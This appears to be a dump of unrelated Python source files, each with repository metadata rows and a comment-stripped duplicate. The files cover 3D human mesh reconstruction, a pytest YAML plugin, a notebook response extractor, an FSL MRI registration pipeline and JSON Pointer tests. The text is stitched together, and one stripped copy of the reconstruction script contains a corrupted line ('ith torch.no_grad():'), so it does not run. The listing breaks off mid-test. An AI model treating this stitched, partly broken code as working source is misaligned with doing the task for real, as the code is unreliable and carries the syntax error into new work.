os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
if start_id < 0:
start_id = 0
if end_id < 0:
end_id = len(test_dataset)
## test
with torch.no_grad():
set_eval()
print('generate mesh (test) ...')
for i in tqdm(range(start_id, end_id)):
if i >= len(test_dataset):
break
# for multi-person processing, set it to False
if True:
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
print(save_path)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
else:
for j in range(test_dataset.get_n_person(i)):
test_dataset.person_id = j
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
opt = parser.parse(args)
recon(opt, use_rect)
if __name__ == '__main__':
reconWrapper()
| 36.075556 | 127 | 0.637797 |
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
color = np.zeros(verts.shape)
interval = 50000
for i in range(len(color) // interval + 1):
left = i * interval
if i == len(color) // interval:
right = -1
else:
right = (i + 1) * interval
net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
color[left:right] = nml.T
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
image_tensor_global = data['img_512'].to(device=cuda)
image_tensor = data['img'].to(device=cuda)
calib_tensor = data['calib'].to(device=cuda)
net.filter_global(image_tensor_global)
net.filter_local(image_tensor[:,None])
try:
if net.netG.netF is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
if net.netG.netB is not None:
image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
except:
pass
b_min = data['b_min']
b_max = data['b_max']
try:
save_img_path = save_path[:-4] + '.png'
save_img_list = []
for v in range(image_tensor_global.shape[0]):
save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
save_img_list.append(save_img)
save_img = np.concatenate(save_img_list, axis=1)
cv2.imwrite(save_img_path, save_img)
verts, faces, _, _ = reconstruction(
net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
xyz_tensor = net.projection(verts_tensor, calib_tensor[:1])
uv = xyz_tensor[:, :2, :]
color = index(image_tensor[:1], uv).detach().cpu().numpy()[0].T
color = color * 0.5 + 0.5
if 'calib_world' in data:
calib_world = data['calib_world'].numpy()[0]
verts = np.matmul(np.concatenate([verts, np.ones_like(verts[:,:1])],1), inv(calib_world).T)[:,:3]
save_obj_mesh_with_color(save_path, verts, faces, color)
except Exception as e:
print(e)
def recon(opt, use_rect=False):
state_dict_path = None
if opt.load_netMR_checkpoint_path is not None:
state_dict_path = opt.load_netMR_checkpoint_path
elif opt.resume_epoch < 0:
state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
opt.resume_epoch = 0
else:
state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
start_id = opt.start_id
end_id = opt.end_id
cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
state_dict = None
if state_dict_path is not None and os.path.exists(state_dict_path):
print('Resuming from ', state_dict_path)
state_dict = torch.load(state_dict_path, map_location=cuda)
print('Warning: opt is overwritten.')
dataroot = opt.dataroot
resolution = opt.resolution
results_path = opt.results_path
loadSize = opt.loadSize
opt = state_dict['opt']
opt.dataroot = dataroot
opt.resolution = resolution
opt.results_path = results_path
opt.loadSize = loadSize
else:
raise Exception('failed loading state dict!', state_dict_path)
if use_rect:
test_dataset = EvalDataset(opt)
else:
test_dataset = EvalWPoseDataset(opt)
print('test data size: ', len(test_dataset))
projection_mode = test_dataset.projection_mode
opt_netG = state_dict['opt_netG']
netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
def set_eval():
netG.eval()
netMR.load_state_dict(state_dict['model_state_dict'])
os.makedirs(opt.checkpoints_path, exist_ok=True)
os.makedirs(opt.results_path, exist_ok=True)
os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
if start_id < 0:
start_id = 0
if end_id < 0:
end_id = len(test_dataset)
ith torch.no_grad():
set_eval()
print('generate mesh (test) ...')
for i in tqdm(range(start_id, end_id)):
if i >= len(test_dataset):
break
if True:
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
print(save_path)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
else:
for j in range(test_dataset.get_n_person(i)):
test_dataset.person_id = j
test_data = test_dataset[i]
save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
opt = parser.parse(args)
recon(opt, use_rect)
if __name__ == '__main__':
reconWrapper()
| true | true |
f72ee1276e038c14fc8978d9c956dd65a321b3bd | 1,588 | py | Python | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | hooks/yaml_plugin/pytest_yamlsound.py | Mjboothaus/intro-to-pytest | 23cfdc6058a10b14a43b5682d82f2f9aadbb6cec | [
"Apache-2.0"
] | null | null | null | import yaml, pytest
def pytest_collect_file(parent, path):
if path.ext == ".yml" and path.basename.startswith("test"):
return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
"""Custom exception for error reporting."""
class YamlFile(pytest.File):
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for spec in raw:
name = spec["name"]
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, name, parent, spec):
super().__init__(name, parent)
self.spec = spec
def runtest(self):
test_type = self.spec.get("type")
if test_type != "check-compression":
raise YamlException(f"unknown test type: {test_type}")
codec = self.spec.get("codec")
if codec != "mp3":
raise YamlException(f"unknown codec: {codec}")
# pseudo check
inputfile = self.spec.get("inputfile")
compression = self.spec.get("compression")
real_comp = "15%"
if compression != real_comp:
raise YamlException(
f"compression of {inputfile} was {real_comp}, "
f"expected {compression}")
def repr_failure(self, excinfo):
"""Called when self.runtest() raises an exception."""
if isinstance(excinfo.value, YamlException):
return f"spec failed: {excinfo.value}"
return super().repr_failure(excinfo)
def reportinfo(self):
return self.fspath, 0, f"usecase: {self.name}"
| 31.76 | 66 | 0.61398 | import yaml, pytest
def pytest_collect_file(parent, path):
if path.ext == ".yml" and path.basename.startswith("test"):
return YamlFile.from_parent(parent, fspath=path)
class YamlException(Exception):
class YamlFile(pytest.File):
def collect(self):
raw = yaml.safe_load(self.fspath.open())
for spec in raw:
name = spec["name"]
yield YamlItem.from_parent(self, name=name, spec=spec)
class YamlItem(pytest.Item):
def __init__(self, name, parent, spec):
super().__init__(name, parent)
self.spec = spec
def runtest(self):
test_type = self.spec.get("type")
if test_type != "check-compression":
raise YamlException(f"unknown test type: {test_type}")
codec = self.spec.get("codec")
if codec != "mp3":
raise YamlException(f"unknown codec: {codec}")
inputfile = self.spec.get("inputfile")
compression = self.spec.get("compression")
real_comp = "15%"
if compression != real_comp:
raise YamlException(
f"compression of {inputfile} was {real_comp}, "
f"expected {compression}")
def repr_failure(self, excinfo):
if isinstance(excinfo.value, YamlException):
return f"spec failed: {excinfo.value}"
return super().repr_failure(excinfo)
def reportinfo(self):
return self.fspath, 0, f"usecase: {self.name}"
| true | true |
f72ee154024e635c3e3a687f0aa84471ed485cdc | 594 | py | Python | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 19 | 2017-11-06T03:19:37.000Z | 2020-12-05T07:20:52.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 1 | 2017-07-27T17:58:38.000Z | 2017-11-02T07:22:44.000Z | Free Response Test Directory/freeresponse.py | ds-modules/ECON-101B | e63a45e881f093e143aa871a390e58115a749c12 | [
"MIT"
] | 4 | 2017-12-27T11:05:48.000Z | 2021-03-08T17:12:11.000Z | import json
import os
files = os.listdir()
for file in files:
if file.endswith('.ipynb'):
answers = ''
with open(file) as data:
nb = json.load(data)
for cell in nb['cells']:
if cell['cell_type'] == 'markdown':
if 'source' in cell and len(cell['source']) > 0:
if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
answers += ''.join(cell['source']) + '\n'
f = open('responses for ' + file[:-6] + '.txt', 'w')
f.write(answers)
f.close() | 37.125 | 83 | 0.476431 | import json
import os
files = os.listdir()
for file in files:
if file.endswith('.ipynb'):
answers = ''
with open(file) as data:
nb = json.load(data)
for cell in nb['cells']:
if cell['cell_type'] == 'markdown':
if 'source' in cell and len(cell['source']) > 0:
if cell['source'][0].startswith("<font color='blue'> ANSWER:"):
answers += ''.join(cell['source']) + '\n'
f = open('responses for ' + file[:-6] + '.txt', 'w')
f.write(answers)
f.close() | true | true |
f72ee175ab02cfd09b428ee248b15c9490ae2b60 | 4,403 | py | Python | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | 1 | 2020-09-23T00:57:20.000Z | 2020-09-23T00:57:20.000Z | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null | fsl/hila_fsl_file_prep.py | HilaGast/FT | e5d3940ea585d98741bd9e42f47b9e49a4b6ee6f | [
"Apache-2.0"
] | null | null | null |
import os
subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'
# for aal
#atlas_template = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_template.nii'
#atlas_template = atlas_template.replace('C:', '/mnt/c')
#atlas_label = r'C:\Users\Admin\my_scripts\aal\origin\AAL_highres_atlas.nii'
#atlas_label = atlas_label.replace('C:', '/mnt/c')
#for megaatlas:
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name
## Registration from MPRAGE to 1st CHARMED scan using inverse matrix of CHARMED to MPRAGE registration:
# From CHARMED to MPRAGE:
subj_mprage = subj_folder + mprage_file_name
subj_first_charmed = subj_folder + first_charmed_file_name
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] +'.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# Creation of inverse matrix:
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# From MPRAGE to CHARMED using the inverse matrix:
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
## BET for registered MPRAGE and mni template:
# BET for registered MPRAGE:
out_brain = out_registered[:-4]+'_brain'
cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain,'-f 0.40','-g 0.20')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# BET for mni template:
'''
# if not performed before, run:
atlas_brain = atlas_template[:-4] + '_brain'
cmd = 'bash -lc "bet {0} {1} {2} {3}"'.format(atlas_template[:-4], atlas_brain,'-f 0.45','-g -0.1')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
'''
## Registration from MNI to regisered MPRAGE:
# flirt for MNI to registered MPRAGE for primary guess:
options = r'-bins 256 -cost corratio -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder+ 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# fnirt for MNI based on flirt results:
#warp_name = subj_folder + 'atlas2subj.nii'
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# apply fnirt warp on atlas template:
atlas_registered = os.path.join(subj_folder+ 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
# apply fnirt warp on atlas labels:
atlas_labels_registered = os.path.join(subj_folder+ 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
## FAST segmentation:
options = r'-t 1 -n 3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
print('Finished file prep for ' +subj_name[:-1])
| 41.537736 | 156 | 0.712242 |
import os
subj_name = r'GaHi_subj01/'
mprage_file_name = r'20181224_160154T1ws002a1001.nii'
first_charmed_file_name = r'f20181224_160154ep2dadvdiffD59d155000s005a001_01.nii'
atlas_template = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtla_Template.nii'
atlas_template = atlas_template.replace('C:', '/mnt/c')
atlas_label = r'C:\Users\Admin\my_scripts\aal\megaatlas\MegaAtlas_cortex_Labels.nii'
atlas_label = atlas_label.replace('C:', '/mnt/c')
main_folder = r'C:\Users\Admin\my_scripts\Ax3D_Pack\V5/'
main_folder = main_folder.replace('C:', '/mnt/c')
subj_folder = main_folder + subj_name
ame
out_registered = subj_folder + 'r' + first_charmed_file_name
out_registered_mat = out_registered[:-4] +'.mat'
options = '-bins 256 -cost normmi -searchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(subj_mprage, subj_first_charmed, out_registered, out_registered_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
inv_mat = out_registered_mat[:-4] + '_inv.mat'
cmd = 'bash -lc "convert_xfm -omat {0} -inverse {1}"'.format(inv_mat, out_registered_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
out_registered = subj_folder + 'r' + mprage_file_name
cmd = 'bash -lc "flirt -in {0} -ref {1} -out {2} -applyxfm -init {3}"'.format(subj_mprage, subj_first_charmed, out_registered, inv_mat)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
md = 'bash -lc "bet {0} {1} {2} {3}"'.format(out_registered[:-4], out_brain,'-f 0.40','-g 0.20')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
rchrx -90 90 -searchry -90 90 -searchrz -90 90 -dof 12 -interp trilinear'
out_brain = out_brain + '.nii'
atlas_brain = atlas_template[:-4] + '_brain.nii'
atlas_registered_flirt = os.path.join(subj_folder+ 'r' + atlas_brain.split(sep="\\")[-1])
atlas_registered_flirt_mat = atlas_registered_flirt[:-4] + '.mat'
cmd = 'bash -lc "flirt -ref {0} -in {1} -out {2} -omat {3} {4}"'.format(out_brain, atlas_brain, atlas_registered_flirt, atlas_registered_flirt_mat, options)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
warp_name = subj_folder + 'atlas2subjmegaatlas.nii'
cmd = 'bash -lc "fnirt --ref={0} --in={1} --aff={2} --cout={3}"'.format(out_brain, atlas_brain, atlas_registered_flirt_mat, warp_name)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_registered = os.path.join(subj_folder+ 'rr' + atlas_brain.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_brain, atlas_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
atlas_labels_registered = os.path.join(subj_folder+ 'r' + atlas_label.split(sep="\\")[-1])
cmd = 'bash -lc "applywarp --ref={0} --in={1} --out={2} --warp={3} --interp={4}"'.format(out_brain, atlas_label, atlas_labels_registered, warp_name, 'nn')
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
3 -H 0.1 -I 4 -l 10.0 -o'
cmd = 'bash -lc "fast {0} {1} {2}"'.format(options, out_brain, out_brain)
cmd = cmd.replace(os.sep,'/')
os.system(cmd)
print('Finished file prep for ' +subj_name[:-1])
| true | true |
f72ee19e4a5aeceed8da6d03d596230a32b33ef5 | 7,332 | py | Python | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | jref/test/test_pointer.py | biochimia/python-json-reference | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | 1 | 2021-05-28T13:39:14.000Z | 2021-05-28T13:39:14.000Z | jref/test/test_pointer.py | biochimia/python-jref | f7c54a7e9b92a12e781d6d8b5f6762e0113337c7 | [
"Apache-2.0"
] | null | null | null | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
def setUp(self):
self.sentinel = object()
def check_pointer_is_sentinel(self, pointer, document):
self.check_pointer_equal(document, pointer, self.sentinel)
def check_pointer_equal(self, document, pointer, value):
self.assertEqual(Pointer.resolve_in(pointer, document), value)
# test that starting slash in non-empty pointer is optional
if (len(pointer) > 1
and pointer[0] == '/'):
self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)
def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
self.assertEqual(
Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer('key').resolve_in(document={'key': self.sentinel}),
self.sentinel)
def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
self.assertEqual(
Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer.resolve_in('key', document={'key': self.sentinel}),
self.sentinel)
def test_an_empty_pointer_resolves_to_the_document(self):
self.check_pointer_is_sentinel('', document=self.sentinel)
def test_empty_root_resolves_to_empty_key(self):
self.check_pointer_is_sentinel('/', document={'': self.sentinel})
def test_it_can_access_a_map_item_by_key(self):
doc = { 'key': self.sentinel }
self.check_pointer_is_sentinel('/key', doc)
def test_it_can_access_nested_map_items_by_key(self):
doc = { 'nested': { 'key': self.sentinel } }
self.check_pointer_is_sentinel('/nested/key', doc)
def test_it_can_access_array_element_by_index(self):
doc = [ 1, 2, self.sentinel, 4, 5 ]
self.check_pointer_is_sentinel('/2', doc)
def test_it_handles_complex_nesting(self):
doc1 = {
'a': [
1, 2, {
'c': [ 3, 4 ],
'd': 5,
},
],
'b': {
'f': [ 6, 7, 8 ],
},
}
self.check_pointer_equal(doc1, '/a/0', 1)
self.check_pointer_equal(doc1, '/a/1', 2)
self.check_pointer_equal(doc1, '/a/2/c/0', 3)
self.check_pointer_equal(doc1, '/a/2/c/1', 4)
self.check_pointer_equal(doc1, '/a/2/d', 5)
self.check_pointer_equal(doc1, '/b/f/0', 6)
self.check_pointer_equal(doc1, '/b/f/1', 7)
self.check_pointer_equal(doc1, '/b/f/2', 8)
doc2 = [
1, 2, {
'a': 3,
'b': {
'c': 4,
'd': [ 5 ],
},
},
]
self.check_pointer_equal(doc2, '/0', 1)
self.check_pointer_equal(doc2, '/1', 2)
self.check_pointer_equal(doc2, '/2/a', 3)
self.check_pointer_equal(doc2, '/2/b/c', 4)
self.check_pointer_equal(doc2, '/2/b/d/0', 5)
def test_it_supports_numerical_keys(self):
self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})
def test_it_supports_dash_as_a_map_key(self):
self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})
def test_it_raises_an_error_for_dash_as_an_array_index(self):
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('/-', document=[])
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('-', document=[])
def test_it_raises_an_error_for_array_index_out_of_range(self):
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('/5', document=[])
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('5', document=[])
def test_it_raises_an_error_for_non_numeric_array_index(self):
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('/key', document=[])
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('key', document=[])
def test_it_raises_an_error_if_key_not_in_document(self):
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('/key', document={})
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('key', document={})
def test_it_recognizes_tilde_escapes(self):
doc = {
'a~b': 1,
'ab~': 2,
'~ab': 3,
'a/b': 4,
'ab/': 5,
'/ab': 6,
'~/~': 7,
'/~/': 8,
'~0': 9,
'~1': 10,
}
self.check_pointer_equal(doc, '/a~0b', 1)
self.check_pointer_equal(doc, '/ab~0', 2)
self.check_pointer_equal(doc, '/~0ab', 3)
self.check_pointer_equal(doc, '/a~1b', 4)
self.check_pointer_equal(doc, '/ab~1', 5)
self.check_pointer_equal(doc, '/~1ab', 6)
self.check_pointer_equal(doc, '/~0~1~0', 7)
self.check_pointer_equal(doc, '/~1~0~1', 8)
self.check_pointer_equal(doc, '/~00', 9)
self.check_pointer_equal(doc, '/~01', 10)
def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('/~2', document={})
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('~2', document={})
def test_it_raises_an_error_on_unescaped_tilde(self):
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('/~', document={})
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('~', document={})
def test_it_raises_an_error_if_unable_to_resolve_token(self):
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('/key', document=object())
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('key', document=object())
def test_it_offers_support_for_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
value = LazyValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
def test_it_offers_support_for_recursive_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
class EvenLazierValue:
def __lazy_eval__(self):
return LazyValue()
value = EvenLazierValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
| 37.6 | 79 | 0.598882 | import unittest
import jref.pointer as error
from jref.pointer import Pointer
class TestPointer(unittest.TestCase):
def setUp(self):
self.sentinel = object()
def check_pointer_is_sentinel(self, pointer, document):
self.check_pointer_equal(document, pointer, self.sentinel)
def check_pointer_equal(self, document, pointer, value):
self.assertEqual(Pointer.resolve_in(pointer, document), value)
if (len(pointer) > 1
and pointer[0] == '/'):
self.assertEqual(Pointer.resolve_in(pointer[1:], document), value)
def test_pointer_resolve_in_can_be_called_as_an_instance_method(self):
self.assertEqual(
Pointer('key').resolve_in({'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer('key').resolve_in(document={'key': self.sentinel}),
self.sentinel)
def test_pointer_resolve_in_can_be_called_as_a_static_method(self):
self.assertEqual(
Pointer.resolve_in('key', {'key': self.sentinel}), self.sentinel)
self.assertEqual(
Pointer.resolve_in('key', document={'key': self.sentinel}),
self.sentinel)
def test_an_empty_pointer_resolves_to_the_document(self):
self.check_pointer_is_sentinel('', document=self.sentinel)
def test_empty_root_resolves_to_empty_key(self):
self.check_pointer_is_sentinel('/', document={'': self.sentinel})
def test_it_can_access_a_map_item_by_key(self):
doc = { 'key': self.sentinel }
self.check_pointer_is_sentinel('/key', doc)
def test_it_can_access_nested_map_items_by_key(self):
doc = { 'nested': { 'key': self.sentinel } }
self.check_pointer_is_sentinel('/nested/key', doc)
def test_it_can_access_array_element_by_index(self):
doc = [ 1, 2, self.sentinel, 4, 5 ]
self.check_pointer_is_sentinel('/2', doc)
def test_it_handles_complex_nesting(self):
doc1 = {
'a': [
1, 2, {
'c': [ 3, 4 ],
'd': 5,
},
],
'b': {
'f': [ 6, 7, 8 ],
},
}
self.check_pointer_equal(doc1, '/a/0', 1)
self.check_pointer_equal(doc1, '/a/1', 2)
self.check_pointer_equal(doc1, '/a/2/c/0', 3)
self.check_pointer_equal(doc1, '/a/2/c/1', 4)
self.check_pointer_equal(doc1, '/a/2/d', 5)
self.check_pointer_equal(doc1, '/b/f/0', 6)
self.check_pointer_equal(doc1, '/b/f/1', 7)
self.check_pointer_equal(doc1, '/b/f/2', 8)
doc2 = [
1, 2, {
'a': 3,
'b': {
'c': 4,
'd': [ 5 ],
},
},
]
self.check_pointer_equal(doc2, '/0', 1)
self.check_pointer_equal(doc2, '/1', 2)
self.check_pointer_equal(doc2, '/2/a', 3)
self.check_pointer_equal(doc2, '/2/b/c', 4)
self.check_pointer_equal(doc2, '/2/b/d/0', 5)
def test_it_supports_numerical_keys(self):
self.check_pointer_is_sentinel('/0', document={'0': self.sentinel})
self.check_pointer_is_sentinel('/1', document={'1': self.sentinel})
self.check_pointer_is_sentinel('/999', document={'999': self.sentinel})
def test_it_supports_dash_as_a_map_key(self):
self.check_pointer_is_sentinel('/-', document={'-': self.sentinel})
def test_it_raises_an_error_for_dash_as_an_array_index(self):
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('/-', document=[])
with self.assertRaises(error.DashArrayIndexNotSupported):
Pointer.resolve_in('-', document=[])
def test_it_raises_an_error_for_array_index_out_of_range(self):
with self.assertRaises(error.IndexOutOfRange):
